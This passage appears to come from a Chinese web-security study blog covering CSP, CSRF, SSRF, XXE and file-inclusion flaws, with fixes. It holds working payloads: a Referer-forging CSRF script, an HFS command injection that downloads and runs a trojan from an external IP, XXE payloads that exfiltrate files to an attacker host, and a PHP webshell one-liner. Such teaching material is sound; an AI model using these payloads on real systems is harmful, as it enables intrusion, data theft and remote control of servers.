Policy\uff09<\/h4>\n\n\n\n<p>\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"https:\/\/blog.csdn.net\/a1766855068\/article\/details\/89370320\" target=\"_blank\" rel=\"noreferrer noopener\">Web\u5b89\u51682.3\uff1aCSP\u5b89\u5168\u7b56\u7565\u3001Cookie\u3001Session\u3001\u540c\u6e90\u7b56\u7565\u3001HTML DOM\u6811_csp meta report url html-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-d553092f10d14cbe55a47dbd9625b071\">CSP\uff0c\u4e00\u79cd\u6587\u4ef6\u4fdd\u5b58\u7b56\u7565\uff0c\u60f3\u529e\u6cd5\u9650\u5236\u5bf9\u5916\u7684\u8bbf\u95ee\u3001\u8df3\u8f6c\u4ece\u800c\u9632\u6b62\u53d1\u751fXSS\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ff879ed63a076f815c4ce5d7e102ae65\">\u4e3e\u4f8b\uff1aheader(&#8220;Content-Secutity-Policy:img-src &#8216;self&#8217; &#8220;);\/\/\u53ea\u5141\u8bb8\u52a0\u8f7d\u672c\u5730\u56fe\u7247<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-98b2343a8010c024958966304579a664\">\u5728\u6e17\u900f\u6d4b\u8bd5\u4e2d<strong>\u82e5\u5df2\u53d6\u5f97\u76f8\u5173WEB\u6743\u9650<\/strong>\uff08\u6709\u4fee\u6539\u6587\u4ef6\u7684\u6743\u9650\uff09\uff0c\u9700\u8981\u8fdb\u884c<strong>\u6743\u9650\u7ef4\u6301<\/strong>\uff0c\u4f46XSS\u6743\u9650\u7ef4\u6301\u5931\u8d25\uff0c\u5219\u53ef\u4ee5\u8003\u8651\u662f\u5426\u662f\u5b58\u5728CSP\u9020\u6210\u5f71\u54cd\u3002\u5c1d\u8bd5\u901a\u8fc7\u5728\u914d\u7f6e\u6587\u4ef6\uff08\u53ef\u80fd\u662f\/function\/c_system_base.php\u6216c_system_admin.php\uff09\u4e2d\u5bfb\u627eContent_Security_Policy\u76f8\u5173\u914d\u7f6e\u5e76\u5220\u9664\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u8bbe\u7f6e\u8f93\u5165\u5185\u5bb9\u7684\u957f\u5ea6\u9650\u5236\u4ee5\u53cahtml\u5b9e\u4f53\u8f6c\u4e49<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b5402cb69b52c1cc50c715571c25a6fa\">\u53ef\u6076\uff0c\u820d\u53cb\u7684\u535a\u5ba2\u7f51\u7ad9\u7684\u8bc4\u8bba\u533a\u5c31\u7528\u4e86\u5b9e\u4f53\u8f6c\u4e49\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u4e8c\u5929\uff1aWEB\u653b\u9632-CSRF&amp;SSRF<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-CSRF\u6f0f\u6d1e<\/h3>\n\n\n\n<p>CSRF\u5168\u79f0\uff1aCross-site request forgery\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e0f8f5617363b0a15822886885920c50\">\u4e5f\u88ab\u79f0\u4e3a&#8221;One Click Attack&#8221;\u6216&#8221;Session Riding&#8221;\uff0c\u7f29\u5199\u4e3aCSRF\u6216XSRF\uff0c\u662f\u4e00\u79cd\u5bf9\u7f51\u7ad9\u7684\u6076\u610f\u5229\u7528\u3002\u8be5\u653b\u51fb\u53ef\u5728\u53d7\u5bb3\u8005\u4e0d\u77e5\u60c5\u7684\u60c5\u51b5\u4e0b\u4ee5\u53d7\u5bb3\u8005\u7684\u540d\u4e49\u4f2a\u9020\u8bf7\u6c42\uff0c\u6267\u884c\u64cd\u4f5c\uff0c\u5982\u8f6c\u8d26\u3001\u4fee\u6539\u5bc6\u7801\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4ddbb60567acc19199c4134b82b83329\">\u653b\u51fb\u6761\u4ef6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u76ee\u6807\u7528\u6237\u5df2\u7ecf\u767b\u5f55\u4e86\u7f51\u7ad9\u4e14\u80fd\u591f\u6267\u884c\u7f51\u7ad9\u7684\u529f\u80fd<\/li>\n\n\n\n<li>\u76ee\u6807\u7528\u6237\u8bbf\u95ee\u4e86\u653b\u51fb\u8005\u6784\u9020\u7684URL<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1bacc3b232406192a978bd59ee4d8bec\">\u6d4b\u8bd5\u5224\u65ad\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u68c0\u6d4b\u662f\u5426\u9a8c\u8bc1\u8bf7\u6c42\u6765\u6e90Referer\uff08\u540c\u6e90\u7b56\u7565\uff09<\/li>\n\n\n\n<li>\u68c0\u6d4bCookie\u51ed\u8bc1\u662f\u5426\u6709token<\/li>\n\n\n\n<li>\u68c0\u6d4b\u5173\u952e\u64cd\u4f5c\u662f\u5426\u6709\u9a8c\u8bc1<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-0a6d78214c4f98e34c2fa3fc80325333\">\u5229\u7528\u6d41\u7a0b\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u83b7\u53d6\u76ee\u6807\u5173\u952e\u64cd\u4f5c\u7684\u89e6\u53d1\u6570\u636e\u5305<\/li>\n\n\n\n<li>\u5229\u7528CSRFTester\u5de5\u5177\u6784\u9020\u5bfc\u51fa<\/li>\n\n\n\n<li>\u8bf1\u4f7f\u53d7\u5bb3\u8005\u8bbf\u95ee\u7279\u5b9a\u5730\u5740\u89e6\u53d1<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\">\u767d\u76d2\u5ba1\u8ba1<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-0376152dd4bd552405c6389d9b1b87d4\">\u5148<strong>\u76f4\u63a5\u5c1d\u8bd5\u590d\u73b0<\/strong>\uff0c\u82e5\u6ca1\u6709\u6210\u529f\u5219\u770b\u4ee3\u7801\u6709\u65e0<strong>\u7f3a\u9677\u8fc7\u6ee4<\/strong>\uff0c\u6709\u5219\u5c1d\u8bd5\u7ed5\u8fc7\uff1b\u82e5\u662f<strong>\u5b8c\u6574\u8fc7\u6ee4<\/strong>\u5219\u5224\u65ad\u65e0\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-63c2ded11dfdc71189ab233ac381ad1f\">\u82e5\u6709\u51fa\u73b0\u9632\u62a4\u5219<strong>\u5ba1\u8ba1\u4ee3\u7801\u8ffd\u6eaf\u53d8\u91cf\u4f20\u9012<\/strong>\uff0c\u627e\u5230\u76f8\u5173\u7684Check\u51fd\u6570\uff0c\u5224\u65ad\u9632\u62a4\u7684\u7c7b\u578b\uff1a\u82e5\u662f<strong>\u540c\u6e90\u7b56\u7565<\/strong>\u9632\u62a4\uff08Referer\uff09\u5219\u5728\u89e6\u53d1<strong>CSRF<\/strong>\u65f6\u6293\u5305\u4fee\u6539Referer\u770b\u770b\u80fd\u4e0d\u80fd\u7ed5\u8fc7\uff0c\u7ed5\u8fc7\u6210\u529f\u5219\u53ef\u4ee5\u5224\u65ad\u662f\u540c\u6e90\u7b56\u7565\u9632\u62a4\uff0c\u8fdb\u4e00\u6b65\u5c1d\u8bd5\u901a\u8fc7\u4ee3\u7801\u4f7f\u76ee\u6807\u5728\u89e6\u53d1CSRF\u65f6<strong>\u81ea\u52a8\u4f2a\u9020Referer<\/strong>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u4e0a\u4f20\u4e00\u4e2aphp\u6587\u4ef6\u7528\u4e8e\u81ea\u52a8\u5316\u4f2a\u9020Referer(POST\u65b9\u6cd5)\n&lt;?php\nfunction send_post($url,$post_data){\n    $postdata=http_build_query($post_data);\n    $options=array(\n        'http'=&gt;array(\n            'method'=&gt;'POST',\n            \/\/\u91cd\u70b9\u662f\u4fee\u6539Referer\n            'header'=&gt;'Referer:http:\/\/localhost:8081\/zblog\/2.html',\n            'content'=&gt;$postdata,\n            'timeout'=&gt;15*60\n        )\n    );\n    $context=stream_context_create($options);\n    $result=file_get_contents($url,false,$context);\n    return $result;\n}\n\/\/\u4f7f\u7528\u65b9\u6cd5\n$post_data=array(\n    'username'=&gt;'Mikuhacker',\n    'password'=&gt;'nekoneko'\n);\nsend_post('http:\/\/&#91;url]:8081\/zblog\/zb_system\/admin\/index.php?act=MemberMng',$post_data);\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-cb86e992975b5b70eb281a5f55e81418\">\u53e6\u4e00\u79cd\u7ed5\u8fc7\u601d\u8def\u662f\u5c1d\u8bd5\u5728\u7f51\u7ad9\u5bfb\u627e\u53ef\u4e0a\u4f20\u70b9\uff0c\u4e0a\u4f20\u6570\u636e\u5305\u6587\u4ef6\uff0c\u53d6\u5f97\u5f53\u524d\u540c\u57df\u540d\u8bbf\u95ee\u5730\u5740\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SSRF\u6f0f\u6d1e<\/h3>\n\n\n\n<p>SSRF\uff1aServer-Side Request Forgery\u670d\u52a1\u5668\u7aef\u8bf7\u6c42\u4f2a\u9020<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-653e112929a2311091d389b08f952097\">\u653b\u51fb\u8005\u6784\u9020\u5f62\u6210\u7531\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u8bf7\u6c42\u3002\u4e00\u822c\u60c5\u51b5\u4e0b\uff0cSSRF\u653b\u51fb\u7684\u76ee\u6807\u662f\u4ece\u5916\u7f51\u65e0\u6cd5\u8bbf\u95ee\u7684\u5185\u90e8\u7cfb\u7edf\uff08\u8ba9\u5185\u7f51\u673a\u5668\u5bf9\u5916\u53d1\u8d77\u8bf7\u6c42\u5efa\u7acb\u8fde\u63a5\uff0c\u5b9e\u73b0\u5185\u7f51\u7a7f\u900f\uff09\u3002SSRF\u5f62\u6210\u539f\u56e0\u591a\u662f\u7531\u4e8e\u670d\u52a1\u7aef\u63d0\u4f9b\u4e86\u4ece\u5176\u4ed6\u670d\u52a1\u5668\u5e94\u7528\u83b7\u53d6\u6570\u636e\u7684\u529f\u80fd\u4e14\u6ca1\u6709\u5bf9\u76ee\u6807\u5730\u5740\u505a\u8fc7\u6ee4\u4e0e\u9650\u5236\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4691490ab18396686189181443544712\">\u653b\u51fb\u6548\u679c\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u670d\u52a1\u626b\u63cf<\/li>\n\n\n\n<li>\u5185\u7f51\u626b\u63cf<\/li>\n\n\n\n<li>\u534f\u8bae\u5229\u7528<\/li>\n\n\n\n<li>MSF\u5229\u7528\uff08\u53cd\u5f39shell\uff09<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-5e2cff87310d68e4914bacd13814dd62\"><strong>\u670d\u52a1\u626b\u63cf<\/strong>\uff1a\u5229\u7528Bp\u6293\u5305\u91cd\u653e\u7206\u7834\u51fa\u5f00\u653e\u7684\u7aef\u53e3<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-dab667c3d7dd623aa05f15eff27a06f1\"><strong>\u5185\u7f51\u626b\u63cf<\/strong>\uff1a\u5229\u7528Bp\u6293\u5305\u91cd\u590d\u7206\u7834\u51fa\u5185\u7f51\u5b58\u6d3b\u4e3b\u673a<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1786f41353302559452c0bee8d06c521\"><strong>\u534f\u8bae\u5229\u7528<\/strong>\uff1a\u6839\u636e\u7f51\u7ad9\u7684\u73af\u5883\uff08\u7cfb\u7edf\u3001\u8bed\u8a00\uff09\u5c1d\u8bd5\u5229\u7528\u534f\u8bae\u8bfb\u53d6\u670d\u52a1\u5668\u672c\u5730\u6587\u4ef6\u751a\u81f3\u547d\u4ee4\u6267\u884c\uff0c\u4f8b\u5982\u5229\u7528file\u534f\u8bae\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\uff1afile:\/\/\/D:\/Users\/passwd\u3002\u547d\u4ee4\u6267\u884c\u6848\u4f8b\uff1aHFS\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-d34239a95cc1400559ff62c3c8ce560d\"><strong>MSF\u5229\u7528\uff08\u53cd\u5f39shell\uff09<\/strong>\uff1a\u5229\u7528\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08\u6b64\u5904\u7528HFS\u6f0f\u6d1e\u4e3e\u4f8b\uff09\u6784\u9020\u547d\u4ee4\uff0c\u8ba9\u670d\u52a1\u5668<strong>\u5411\u5916\u8bf7\u6c42<\/strong>\u4e0b\u8f7d\u6728\u9a6c\u6587\u4ef6\uff1ahttp:\/\/127.0.0.1\/?search==%00{.exec|cmd \/c certutil.exe -urlcache -split -f http:\/\/47.120.52.135:80\/xx.exe xx.exe.}\uff1b\u7136\u540e\u6267\u884c\u6728\u9a6c\u6587\u4ef6\uff1ahttp:\/\/127.0.0.1\/?search==%00{.exec|xx.exe.}\uff1b\u6267\u884c\u6210\u529f\u540e\u5c06\u4e0a\u7ebfMSF\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-5ad4b76d72e3a9f0b88d850790874a8a\"><strong>\u9ed1\u76d2\u6d4b\u8bd5<\/strong>\u5e38\u89c1\u51fa\u73b0\u70b9\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u793e\u4ea4\u5206\u6790\u529f\u80fd\uff1a\u80fd\u83b7\u53d6\u8d85\u94fe\u63a5\u7684\u6807\u9898\u7b49\u5185\u5bb9\u8fdb\u884c\u663e\u793a<\/li>\n\n\n\n<li>\u8f6c\u7801\u670d\u52a1\uff1a\u901a\u8fc7URL\u5730\u5740\u628a\u539f\u5730\u5740\u7f51\u9875\u5185\u5bb9\u8c03\u4f18\u4f7f\u5176\u9002\u5408\u624b\u673a\u5c4f\u5e55\u6d4f\u89c8<\/li>\n\n\n\n<li>\u5728\u7ebf\u7ffb\u8bd1\uff1a\u7ed9\u7f51\u5740\u7ffb\u8bd1\u5bf9\u5e94\u7f51\u9875\u7684\u5185\u5bb9<\/li>\n\n\n\n<li>\u56fe\u7247\u52a0\u8f7d\/\u4e0b\u8f7d\uff1a\u4ece\u8fdc\u7a0b\u5730\u5740\u83b7\u53d6\u56fe\u7247<\/li>\n\n\n\n<li>\u56fe\u7247\/\u6587\u7ae0\u6536\u85cf\u529f\u80fd\uff1a\u53ef\u80fd\u4ece\u8fdc\u7a0b\u5730\u5740\u83b7\u53d6URL\u7684Title\u4ee5\u53ca\u6587\u672c\u5185\u5bb9<\/li>\n\n\n\n<li>\u4e91\u670d\u52a1\u5382\u5546\uff1a\u4f1a\u8fdc\u7a0b\u6267\u884c\u4e00\u4e9b\u547d\u4ee4\u6765\u5224\u65ad\u7f51\u7ad9\u662f\u5426\u5b58\u6d3b\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u6355\u83b7\u4fe1\u606f<\/li>\n\n\n\n<li>\u7f51\u7ad9\u91c7\u96c6\u3001\u6293\u53d6\uff1a\u4e00\u4e9b\u7f51\u7ad9\u9488\u5bf9\u8f93\u5165\u7684url\u8fdb\u884c\u4e00\u4e9b\u4fe1\u606f\u91c7\u96c6\u5de5\u4f5c<\/li>\n\n\n\n<li>\u6570\u636e\u5e93\u5185\u7f6e\u529f\u80fd\uff1a\u4f8b\u5982mongodb\u7684copyDatabase\u51fd\u6570<\/li>\n\n\n\n<li>\u90ae\u4ef6\u7cfb\u7edf\uff1a\u63a5\u6536\u90ae\u4ef6\u670d\u52a1\u5668\u5730\u5740<\/li>\n\n\n\n<li>\u7f16\u7801\u3001\u5c5e\u6027\u4fe1\u606f\u3001\u6587\u4ef6\u5904\u7406<\/li>\n\n\n\n<li>\u672a\u516c\u5f00\u7684api\u5b9e\u73b0\u4ee5\u53ca\u5176\u4ed6\u6269\u5c55\u8c03\u7528URL\u7684\u529f\u80fd\uff1a\u53ef\u4ee5\u5229\u7528google\u8bed\u6cd5\u52a0\u4e0a\u5173\u952e\u5b57\u5bfb\u627eSSRF\u6f0f\u6d1e\uff1ashare,wap,url,link,src,source,target,u,3g,display,sourceURL,imageURL,domain<\/li>\n\n\n\n<li>\u4ece\u8fdc\u7a0b\u670d\u52a1\u5668\u8bf7\u6c42\u8d44\u6e90\uff1aupload from [url]\u5982discuz,import&amp;export rss feed;\u4f8b\u5982\u4f7f\u7528\u4e86xml\u5f15\u64ce\u5bf9\u8c61\u7684\u5730\u65b9-wordpress xmlrpc.php<\/li>\n<\/ol>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1030f289d888a471a47bf9ad607ba872\"><strong>\u767d\u76d2\u6d4b\u8bd5<\/strong>\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u529f\u80fd\u70b9\u6293\u5305\u6307\u5411\u4ee3\u7801\u5757\u5ba1\u8ba1<\/li>\n\n\n\n<li>\u529f\u80fd\u70b9\u51fd\u6570\u5b9a\u4f4d\u4ee3\u7801\u5757\u5ba1\u8ba1<\/li>\n<\/ol>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-80add1f1647bfba0e757d5e2cb3b4a36\">\u4fee\u590d\u65b9\u5f0f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7981\u7528\u8df3\u8f6c<\/li>\n\n\n\n<li>\u7981\u7528\u4e0d\u9700\u8981\u7684\u534f\u8bae<\/li>\n\n\n\n<li>\u56fa\u5b9a\u6216\u9650\u5236\u8d44\u6e90\u5730\u5740<\/li>\n\n\n\n<li>\u9519\u8bef\u4fe1\u606f\u7edf\u4e00\u4fe1\u606f\u5904\u7406<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u4e09\u5929\uff1aWEB\u653b\u9632-XML&amp;XXE\u6ce8\u5165<\/h2>\n\n\n\n<p>\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"https:\/\/www.cnblogs.com\/20175211lyz\/p\/11413335.html\" target=\"_blank\" rel=\"noreferrer noopener\">CTF XXE &#8211; MustaphaMond &#8211; \u535a\u5ba2\u56ed (cnblogs.com)<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-9d8c8a1ef87310b474f1420043a8983a\">XML\u88ab\u8bbe\u8ba1\u4e3a\u4f20\u8f93\u548c\u5b58\u50a8\u6570\u636e\uff0cXML\u6587\u6863\u7ed3\u6784\u5305\u62ecXML\u58f0\u660e\u3001DTD\u6587\u6863\u7c7b\u578b\u5b9a\u4e49\uff08\u53ef\u9009\uff09\u3001\u6587\u6863\u5143\u7d20\uff0c\u7126\u70b9\u662f\u6570\u636e\u7684\u5185\u5bb9\uff0c\u5c06\u6570\u636e\u4eceHTML\u5206\u79bb\uff0c\u662f\u72ec\u7acb\u4e8e\u8f6f\u786c\u4ef6\u7684\u4fe1\u606f\u4f20\u8f93\u5de5\u5177\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-a5c150e38489c05152c8b10ccffb21d6\">XXE\u6f0f\u6d1e\u5168\u79f0XML External Entity Injection\uff0cXML\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\u6f0f\u6d1e\u3002\u6f0f\u6d1e\u53d1\u751f\u5728\u5e94\u7528\u7a0b\u5e8f\u89e3\u6790XML\u8f93\u5165\u65f6\uff0c\u6ca1\u6709\u7981\u6b62\u5916\u90e8\u5b9e\u4f53\u7684\u52a0\u8f7d\uff0c\u5bfc\u81f4\u53ef\u52a0\u8f7d\u6076\u610f\u5916\u90e8\u6587\u4ef6\uff0c\u9020\u6210\u6587\u4ef6\u8bfb\u53d6\uff08\u4e3b\u8981\u7684\uff09\u3001\u547d\u4ee4\u6267\u884c\u3001\u5185\u7f51\u7aef\u53e3\u626b\u63cf\u3001\u653b\u51fb\u5185\u7f51\u7f51\u7ad9\u7b49\u5371\u5bb3\u3002<\/p>\n\n\n\n<p>XML\u4e0eHTML\u7684\u4e3b\u8981\u5dee\u5f02\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>XML\u88ab\u8bbe\u8ba1\u4e3a\u4f20\u8f93\u548c\u5b58\u50a8\u6570\u636e\uff0c\u5176\u7126\u70b9\u662f\u6570\u636e\u7684\u5185\u5bb9<\/li>\n\n\n\n<li>HTML\u88ab\u8bbe\u8ba1\u7528\u6765\u663e\u793a\u6570\u636e\uff0c\u5176\u7126\u70b9\u662f\u6570\u636e\u7684\u5916\u89c2<\/li>\n\n\n\n<li>HTML\u65e8\u5728\u663e\u793a\u4fe1\u606f\uff0c\u800cXML\u65e8\u5728\u4f20\u8f93\u4fe1\u606f<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u5229\u7528\u793a\u4f8b<\/h3>\n\n\n\n<p>\u8bfb\u53d6\u6587\u4ef6\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\"?&gt;\n&lt;!DOCTYPE Miku&#91;\n    &lt;!ENTITY test SYSTEM \"file:\/\/\/d:\/passwd.txt\"&gt;\n]&gt;\n&lt;user&gt;&lt;username&gt;&amp;test;&lt;\/username&gt;&lt;password&gt;Miku&lt;\/password&gt;&lt;\/user&gt;<\/code><\/pre>\n\n\n\n<p>\u5e26\u5916\u6d4b\u8bd5\uff0c\u68c0\u6d4b\u80fd\u5426\u5bf9\u5916\u8bbf\u95ee\u3001\u52a0\u8f7d\uff08\u8bbf\u95eeDNSlog\u7559\u4e0b\u8bb0\u5f55\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\"?&gt;\n&lt;!DOCTYPE test&#91;\n    &lt;!ENTITY % file SYSTEM \"http:\/\/&#91;DNSurl].dnslog.cn\"&gt;\n    %file;\n]&gt;\n&lt;user&gt;&lt;username&gt;&amp;send;&lt;\/username&gt;&lt;password&gt;Miku&lt;\/password&gt;&lt;\/user&gt;<\/code><\/pre>\n\n\n\n<p>\u5916\u90e8\u5f15\u7528\u5b9e\u4f53DTD\uff08\u89e3\u51b3\u62e6\u622a\u9632\u62a4\u7ed5\u8fc7\u95ee\u9898\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\"&gt;\n&lt;!DOCTYPE test&#91;\n    &lt;!ENTITY % file SYSTEM \"http:\/\/127.0.0.1:8081\/evil.dtd\"&gt;\n    %file;\n]&gt;\n&lt;user&gt;&lt;username&gt;&amp;send;&lt;\/username&gt;&lt;password&gt;Miku&lt;\/password&gt;&lt;\/user&gt;\n\n\/\/evil.dtd\n&lt;!ENTITY send SYSTEM \"file:\/\/\/d:\/passwd.txt\"&gt;<\/code><\/pre>\n\n\n\n<p>\u5229\u7528\u53c2\u6570\u4f20\u9012\u89e3\u51b3\u65e0\u56de\u663e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\"&gt;\n&lt;!DOCTYPE ANY&#91;\n    &lt;!ENTITY % file SYSTEM \"file:\/\/\/d:\/passwd.txt\"&gt;\n    &lt;!ENTITY % remote SYSTEM \"http:\/\/47.120.52.135\/Miku.dtd\"\n    %remote;\n    %all;\n]&gt;\n&lt;root&gt;&amp;send;&lt;\/root&gt;\n\n\/\/\u8fdc\u7a0b\u4e3b\u673a\uff08\u653b\u51fb\u673a\uff09Miku.dtd\n&lt;!ENTITY % all \"&lt;!ENTITY send SYSTEM 'http:\/\/47.120.52.135\/get.php?file=%file;'&gt;\"&gt;\n\/\/get.php\u8fdb\u884c\u6570\u636e\u63a5\u6536\u548c\u663e\u793a<\/code><\/pre>\n\n\n\n<p>\u8fd8\u6709\u5176\u4ed6\u5229\u7528\u534f\u8bae\u7684\u7ed5\u8fc7\u65b9\u5f0f\uff0c\u5177\u4f53\u53ef\u7528\u534f\u8bae\u8981\u770b\u8bed\u8a00\u73af\u5883\u3002<\/p>\n\n\n\n<p>\u9ed1\u76d2\u6d4b\u8bd5\u53d1\u73b0\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6293\u5305\u5f97\u5230Content-Type\u6216\u6570\u636e\u7c7b\u578b\u4e3aXML\u65f6\uff0c\u5c1d\u8bd5XML-Payload\u6d4b\u8bd5<\/li>\n\n\n\n<li>\u4e0d\u7ba1\u83b7\u53d6\u7684Content-Type\u6216\u6570\u636e\u4f20\u8f93\u7c7b\u578b\uff0c\u5747\u5c1d\u8bd5\u4fee\u6539\u540e\u63d0\u4ea4\u6d4b\u8bd5xxe<\/li>\n\n\n\n<li>XXE\u4e0d\u4ec5\u5728\u6570\u636e\u4f20\u8f93\u4e0a\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\uff0c\u5728\u6587\u4ef6\u4e0a\u4f20\u5f15\u7528\u63d2\u4ef6\u89e3\u6790\u6216\u9884\u89c8\u4e5f\u4f1a\u9020\u6210\u6587\u4ef6\u4e2d\u7684XXE-Payload\u88ab\u6267\u884c<\/li>\n<\/ul>\n\n\n\n<p>\u767d\u76d2\u6d4b\u8bd5\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u901a\u8fc7\u5e94\u7528\u529f\u80fd\u8ffd\u8e2a\u4ee3\u7801\u5b9a\u4f4d\u5ba1\u8ba1<\/li>\n\n\n\n<li>\u901a\u8fc7\u811a\u672c\u7279\u5b9a\u51fd\u6570\u641c\u7d22\u5b9a\u4f4d\u5ba1\u8ba1\uff08\u5168\u5c40\u641c\u7d22XML\u89e3\u6790\u51fd\u6570\uff09<\/li>\n\n\n\n<li>\u901a\u8fc7\u4f2a\u534f\u8bae\u7528\u6cd5\u7ed5\u8fc7\u76f8\u5173\u4fee\u590d\u9632\u62a4<\/li>\n<\/ul>\n\n\n\n<p>\u4fee\u590d\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7981\u7528\u5916\u90e8\u5b9e\u4f53<\/li>\n\n\n\n<li>\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684XML\u6570\u636e\uff08\u5173\u952e\u5b57&lt;!DOCTYPE\u548c&lt;!ENTITY\u6216\u8005SYSTEM\u548cPUBLIC\uff09<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u56db\u5929\uff1aWEB\u653b\u9632-\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$file=$_GET&#91;'x'];\ninclude($file);\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-97322088cb92c995f392967a8a75d28f\">\u672c\u662f\u7528\u4e8e\u5305\u542b\u666e\u901a\u6587\u672c\u7684\u4ee3\u7801\uff0c\u56e0\u6ca1\u6709\u8fc7\u6ee4\uff0c\u82e5\u4f20\u5165\u811a\u672c\u6587\u4ef6\u5c06\u88ab\u6267\u884c\uff0c\u5373\u4f7f\u662f\u6587\u672c\u6587\u4ef61.txt\uff0c\u91cc\u9762\u82e5\u662f\u811a\u672c\u4ee3\u7801\u5219\u4e5f\u4f1a\u88ab\u8c03\u7528php\u89e3\u6790\u6267\u884c\uff0c\u4e8e\u662f\u6709\u4e86\u6076\u610f\u4ee3\u7801\u6267\u884c\u7684\u53ef\u80fd\u3002<\/p>\n\n\n\n<p>\u4e24\u79cd\u5229\u7528\u601d\u8def<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u914d\u5408\u6587\u4ef6\u4e0a\u4f20\uff1a\u4e0a\u4f20\u5e26\u6709\u811a\u672c\u540e\u95e8\u4ee3\u7801\u7684\u56fe\u7247\uff0c\u5305\u542b\u56fe\u7247\u89e6\u53d1\u540e\u95e8<\/li>\n\n\n\n<li>\u914d\u5408\u65e5\u5fd7\u6587\u4ef6\uff1a\u4f2a\u9020UA\u4fe1\u606f\u4e3a\u540e\u95e8\u4ee3\u7801\uff0c\u8bb0\u5f55\u5230\u65e5\u5fd7\u6587\u4ef6\uff0c\u5305\u542b\u65e5\u5fd7\u6587\u4ef6\u89e6\u53d1\u540e\u95e8<\/li>\n\n\n\n<li>\u914d\u5408\u4f1a\u8bdd\u6587\u4ef6\uff1a\u5199\u5165session\u4e00\u53e5\u8bdd\uff1a&lt;?php fputs(fopen(&#8216;shell.php&#8217;,&#8217;w&#8217;),'&lt;?php @eval($_POST[&#8216;shell&#8217;])?&gt;&#8217;);?&gt;  \/\/\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"https:\/\/www.cnblogs.com\/lnterpreter\/p\/14086164.html\" target=\"_blank\" rel=\"noreferrer noopener\">session\u5305\u542b &#8211; lnterpreter &#8211; \u535a\u5ba2\u56ed 